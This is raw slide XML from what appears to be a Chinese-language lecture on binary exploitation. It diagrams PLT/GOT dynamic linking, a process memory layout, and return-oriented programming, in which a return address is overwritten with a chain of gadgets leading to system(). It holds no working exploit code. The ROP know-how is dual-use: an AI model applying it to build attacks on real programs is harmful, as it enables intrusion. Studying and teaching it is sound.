            <a:off x="4166233"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foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022" name="Shape 1022"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067" y="1564600"/>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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Shape 1023"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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1024" name="Shape 1024"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>
            <a:ext cx="1180400" cy="543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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F37C3DA-1CB0-47DA-A3D4-F60FDCC00FAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="4163319" cy="646331"/>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直接自 </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got.plt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跳转到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的真实地址</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没有了第一次的解析地址过程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22135E10-5A79-449D-BF7E-D72B55F83A95}"/>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动态链接过程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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C810022-AA5A-4FC5-8440-52B0537EDFEC}"/>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1813637" y="1018235"/>
            <a:ext cx="8211309" cy="5197277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CFDD52A-423B-4178-954C-FA62A0512EFE}"/>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动态链接过程</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4456439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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6631564" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>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For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>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8" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>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Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="44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0" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>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 name="Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>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Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274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a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>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4" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="2742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Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t> = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>gadget_addr</a:t>
              </a:r>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10672628" y="1208198"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6631567" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>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Shape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631570" y="4525879"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631567" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631565" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6631566" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:endParaRPr sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10514586" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>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96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156960" y="5492854"/>
            <a:ext cx="474606"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A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6156951" y="5492854"/>
            <a:ext cx="9" cy="262161"/>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5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156951" y="5755015"/>
            <a:ext cx="474614" cy="1010"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514586" y="5756025"/>
            <a:ext cx="474606"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77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10989178" y="3010915"/>
            <a:ext cx="0" cy="274442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17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10514588" y="3010915"/>
            <a:ext cx="474578" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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5" name="文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102045" y="2784110"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11102389" y="5545729"/>
            <a:ext cx="858835" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1193067" y="2769256"/>
            <a:ext cx="3366042"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篡改栈帧上自返回地址开始的一段区域为一系列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
